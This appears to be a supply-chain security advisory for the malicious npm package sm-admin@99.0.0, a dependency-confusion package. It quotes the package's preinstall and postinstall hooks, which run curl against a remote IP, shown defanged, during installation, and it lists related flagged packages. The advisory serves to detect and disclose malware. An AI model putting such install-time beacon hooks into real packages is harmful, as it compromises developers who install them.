LWA-2026-11572 confirmed malware
sm-admin@99.0.0
Malicious code in sm-admin (npm)
T1059 · Command and Scripting InterpreterT1071.001 · Web Protocols
Analysis
sm-admin@99.0.0 (version 99.0.0, a dependency-confusion-shaped name) runs two install-time network beacons: its preinstall hook executes `curl -s hxxp://16[.]192[.]173[.]5/sm-admin/pre` and its postinstall hook executes `curl -s hxxp://16[.]192[.]173[.]5/sm-admin/post`, both fetching from the remote host 16[.]192[.]173[.]5 during package installation. The package ships no functional code (a 157-byte index.js that only logs a message).
- analyzed by
- Leitwacht
- first seen
- Aug 23, 2026, 06:30 PM
- analyzed
- Aug 23, 2026, 06:30 PM
Related advisories
- sm-cart@99.0.0
- hydration-dim-kit@1.0.0
- fetch-page-assets@1.2.13
- @syncraft-labs/core@0.4.1
- hatdhat-testkit@3.2.14
- solidity-testing-utils@1.2.0
- rust-testing-utils@2.3.0
- @pablo_clueless/sniffr@0.1.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.